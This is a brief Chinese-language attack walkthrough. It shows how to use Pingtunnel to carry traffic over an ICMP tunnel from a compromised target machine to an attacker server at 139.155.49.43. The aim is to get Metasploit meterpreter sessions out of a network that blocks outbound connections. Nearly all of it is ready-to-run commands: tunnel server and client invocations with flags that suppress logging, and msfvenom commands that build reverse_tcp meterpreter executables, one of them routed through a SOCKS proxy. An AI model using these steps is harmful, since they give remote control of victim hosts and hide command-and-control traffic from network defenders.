工具

• Pingtunnel

使用步骤

• ICMP隧道转发TCP上线MSF(通常无法成功反弹，可能因为icmp隧道不能承载流量)

*1、服务器启动

./pingtunnel -type server

*2、靶机启动ICMP隧道客户端

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 139.155.49.43 -t 139.155.49.43:7777 -tcp 1 -noprint 1 -nolog 1

*参数：
-t       远端服务器转发的目的地址，流量将转发到这个地址
-tcp     设置是否转发tcp，默认0
-nolog   不写日志文件，只打印标准输出，默认0
-noprint 不打印屏幕输出，默认0

*3、msf生成payload

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=127.0.0.1
lport=9999 -f exe > 9999.exe

*注：这里payload是连接内网ip的9999端口，因为限制了出网访问，只能通过这种方式请求连接内网9999端口，然后流量通过icmp隧道转发到外网

ICMP隧道转发Socks上线MSF

./pingtunnel -type server

pingtunnel.exe -type client -l 127.0.0.1:9999 -s 139.155.49.43
-sock5 1 -noprint 1 -nolog 1

这里使用工具生成了127.0.0.1：9999的socks5的代理
参数：
-sock5   开启sock5转发，默认0

msfvenom -p windows/x64/meterpreter/reverse_tcp
lhost=139.155.49.43 lport=8899 HttpProxyType=SOCKS
HttpProxyHost=127.0.0.1 HttpProxyPort=9999 -f exe > 8899.exe

*这里让payload自动使用代理请求攻击机